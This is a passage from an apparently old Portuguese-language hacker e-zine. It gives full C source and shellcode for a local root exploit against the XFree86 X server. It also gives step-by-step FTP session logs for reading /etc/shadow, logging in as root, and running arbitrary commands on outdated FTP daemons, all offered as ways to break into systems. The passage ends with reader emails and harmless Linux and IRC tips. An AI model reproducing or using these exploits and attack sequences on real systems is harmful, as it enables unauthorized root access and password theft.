%%%%% %%%%%%%% %% % %%% % %%%%%%%%% %%%%% 8. Invasao de privacidade %%%%% %%%%% %%% %%% % % %% % %%%%% %%%%%% %%%%%% %%%%%%%%% %% %%%% % %% % % %%%%%%%%% %%%%%%% %%%%%%% % % % % %%% % %%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Obtendo prompt de root Aqui vai um exploit que soh tah saindo porque eu nao tinha mais nada em maos para botar aqui. Corte aqui este Exploit e compile-o com o cc. Soh relembrando: cc -o x x.c -----------------------------Corte Aki--(x.c)-------------------------------- #define OFFSET 2 #include #include #include #define LENCODE ( sizeof( Code ) ) char Code[] = "\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0" "\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41" "\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd" "\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e" "\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh"; char Display[ 0x4001 + OFFSET ] = ":99999", *ptr = Display + OFFSET + 1; char *args[] = { "X", "-nolock", Display, NULL }; main() { printf("Exploit para XFree86 \npor mAChnHEaD \n\nSe agora nao aparecer o prompt tente usar valores diferentes para o OFFSET. \n\n"); dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 ); __asm__("movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000)); memcpy( ptr + 4, ptr, 0x3fc ); memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE ); memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE ); execve( "/usr/X11R6/bin/X", args, args + 3 ); perror( "execve" ); } ----------------------------------------------------------------------------- Esqueci de falar, este exploit e' para um bug no /usr/X11R6/bin/X que em varias shells esta setado como PATCH para qquer usuario. E' uma bela escolha para hackear sistemas linux. øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%% % % % % %%%% % %%%%% %%%%%% %%%%%%%%%%%%%%% %%%%% %%%%%%%% %% % %%% % %%%%%%%%% %%%%% 9. Hack, the Art %%%%%%%%%%%%%% %%%%% %%% %%% % % %% % %%%%% %%%%%% %%%%%%%%%%%%%%% %%%%%%%%% %% %%%% % %% % % %%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%% % % % % %%% % %%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Hacking via FTP [1] Alguns FTPs meio antigos, mas ainda encontrados possuem falhas assim como o comando SITE. Com este comando(que provavelmente e' o mais perigoso do FTP) vc pode fazer por exemplo: chmod 777 /etc/shadow cat /etc/shadow Bacana ne'?? Vou mostrar como faze-lo com um log para ficar mais rapido e pratico: # telnet host.com.br 21 USER Anonymous PASS ftp@ghost.com PWD /pub SITE CWD /etc SITE CHMOD 777 shadow SITE EXEC /bin/cat /etc/shadow >> usr/ftp/pub/senhas QUIT Agora conectesse usando o programa ftp e pegue o arquivo senhas no diretorio /pub . Pretty Cool!!! øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Hacking via FTP [2] Este bug era muito divulgado nas paginas hackers a um tempo atraz, atualmente soh os desatualizados ainda disem que voce ainda pode encontra-lo em uns daemons. O que ele fazia era dar o comando CWD durante o login para entrar como root. Aqui vai o log: # ftp -n ftp> open host.com.br ftp> quote user ftp ftp> quote cwd ~root ftp> quote pass ftp ftp> øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Hacking via FTP [3] Esse e' uma falha do descompactador 'tar' que vinha como padrão para poder ser executado por qquer usuario ftp(inclusive o Anonymous). Veja o Login: # telnet host.com.br 21 USER Anonymous PASS ftp@ghost.com SITE EXEC tar -c -v --rsh-command="qquer comando" -f somebox:foo foo QUIT Assim voce pode executar qualquer comando do sistema, trocando o "qquer comando" pelo comando. øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Hacking via FTP [4] Este meio de pegar o /etc/shadow utiliza um bug das versoes antigas do wu-ftpd(o mais usado por provedores). Jah conectado ao telnet do servidor faça segundo o log: $ ftp -n localhost ftp> user bunda Password: ftp> ^Z [1]+ Stopped ftp -n localhost $ ps uwx USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND bunda 15510 0.0 5.4 384 384 pp6 S 14:32 0:01 -bash bunda 15811 0.7 3.9 113 276 pp4 T 15:09 0:00 ftp -n localhost bunda 15812 2.0 7.1 157 500 con S 15:09 0:00 -localhost: marekm:IDLE bunda 15816 0.0 3.1 64 224 pp4 R 15:10 0:00 ps uwx $ ls -al /proc/15812/fd total 0 dr-x------ 2 joberto users 0 Jun 9 15:10 . dr-xr-xr-x 4 joberto users 0 Jun 9 15:10 .. lrwx------ 1 joberto users 64 Jun 9 15:10 0 -> [0000]:0 lrwx------ 1 joberto users 64 Jun 9 15:10 1 -> [0000]:0 l-wx------ 1 joberto users 64 Jun 9 15:10 10 -> [0301]:4623 l-wx------ 1 joberto users 64 Jun 9 15:10 11 -> [0301]:4624 l-wx------ 1 joberto users 64 Jun 9 15:10 2 -> [0301]:10404 lrwx------ 1 joberto users 64 Jun 9 15:10 3 -> [0000]:0 lrwx------ 1 joberto users 64 Jun 9 15:10 4 -> [0000]:0 lr-x------ 1 joberto users 64 Jun 9 15:10 5 -> [0301]:38392 lr-x------ 1 joberto users 64 Jun 9 15:10 6 -> [0301]:8567 lrwx------ 1 joberto users 64 Jun 9 15:10 7 -> [0301]:34549 lr-x------ 1 joberto users 64 Jun 9 15:10 8 -> [0301]:8569 lr-x------ 1 joberto users 64 Jun 9 15:10 9 -> [0301]:32007 $ ls -i /etc/shadow 32007 /etc/shadow $ cat /proc/15812/fd/9 root:Ab7d/r3se:0:0:User Root:/home/root:/bin/bash ... $ fg ftp -n localhost 221 Goodbye. $ exit øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Hacking via FTP [5] Essa maneira ira criar o core e depois verificar se ele armazenou uma senha. $ ftp -n -i ftp> open ftp.host.com.br ftp> user poliana xx ftp> quote pasv ftp> quit $ strings /core øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%% % % % % %%%% % %%%%% %%%%%% %%%%%%%%%%% %%%%% %%%%%%%% %% % %%% % %%%%%%%%% %%%%% 10. Emails & Bonus! %%%%%%%%%% %%%%% %%% %%% % % %% % %%%%% %%%%%% %%%%%%%%%%% %%%%%%%%% %% %%%% % %% % % %%%%%%%%% %%%%%%% %%%%%%%%%%%% % % % % %%% % %%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Emails.. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From: XXXXX@xoommail.com Subject: WinNT > Ae Struck. > > A CSZine tah blza mesmo mano, porem tem umas materias que nao me agradaram >muito como por exemplo as varias edicoes em que sairam metodos de hackear >WinNT. Eu uso a internet por quase 2 anos e ainda nao encontrei um provedor >que use um Windoze NT. > > Espero que escreva mais sobre UNIX. > > Eu poderia ter mandado o email apenas dizendo que a CSZine ta bacana, mas >como tu pediu para dar criticas. > > Ass: XXXXX Eu me impressiono que em 2 anos de internet voce nao tenha encontrado um provedor que use WinNT. So' de Porto Alegre eu posso citar 3: * TCA Internet Provider(tca-nt.tca.com.br) * VaNet Internet Solutions(dolar.vanet.com.br) * Universo On Line - UOL(cobato.uol.com.br) Se quizer descobrir se o provedor esta de WinNT entre pelo FTP e veja se ele usa o Microsoft FTP Service, se sim, vc jah sabe. Voce tb pode notar pela diferenca que tem a estrutura dos diretorios num WinNT para um UNIX. Obrigado pelo elogio. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From : XXXXX@CPOVO.com.br Subject : Perguntas sobre linux > ola > eu li todas as edicoes dessa zine(até a 20) e como as outras ela ainda nao >conseguiu resolver os meus problemas com o linux redhat > 1 - como usar a multi-função do linux ? > 2 - como me conectar com o linux ? > 3 - pode colocar uma listinha de comandos para bitchx ? > porfavor responda as perguntas para mim não ter mais que usar o windoze 95. Tudo bem. Eu iria colocar essas questoes na secao de Hacking para iniciantes, mas ai iria ficar apenas um email. Aqui vao as suas respostas. 1 - Voce pode usar varios terminais TTY no linux, o que o considera multi-funcao. A cada terminal que utilizar tera que entrar com um login. Para entrar com outro terminal digiite Alt+FXX. Exemplo: Voce entrou como root no TTY1, conectou-se e abriu o BitchX, entao se quizer abrir o Lynx em outro terminal digite Alt+F2, loge-se e abra o lynx. Moleza neh?? 2 - Vou dar exemplo de como eu faço para me conectar a conex. A) Edite o /etc/resolv.conf e acressente as seguintes linhas: domain conex.com.br nameserver 200.248.100.3 B) Digite: echo "pppd /dev/modem 38400 defaultroute" >> /bin/connect C) Abra o minicom (digite: minicom). D) No minicom digite: atdp 3230011 E) Digite o login/senha F) Segure Ctrl+A por alguns segundos, solte e tecle Z. G) Tecle Q e confirme, para sair do programa. H) Digite connect. I) Pronto!!! 3- Deixa isso pra uma edicao futura. Os comandos de bitchx, sao muito relacionados ao mIRC. Aqui vai uma breve introduction: /server - Conecta ao /echo msg - Exibe msg apenas a vc /list -YES - Lista canais /query - PVT com /msg - Como se falasse por PVT com o /join <#canal> - Entra em <#canal> /part <#canal> - Sai do <#canal> /ver - CTCP Version /quit - Sai do BitchX deixando uma msg /load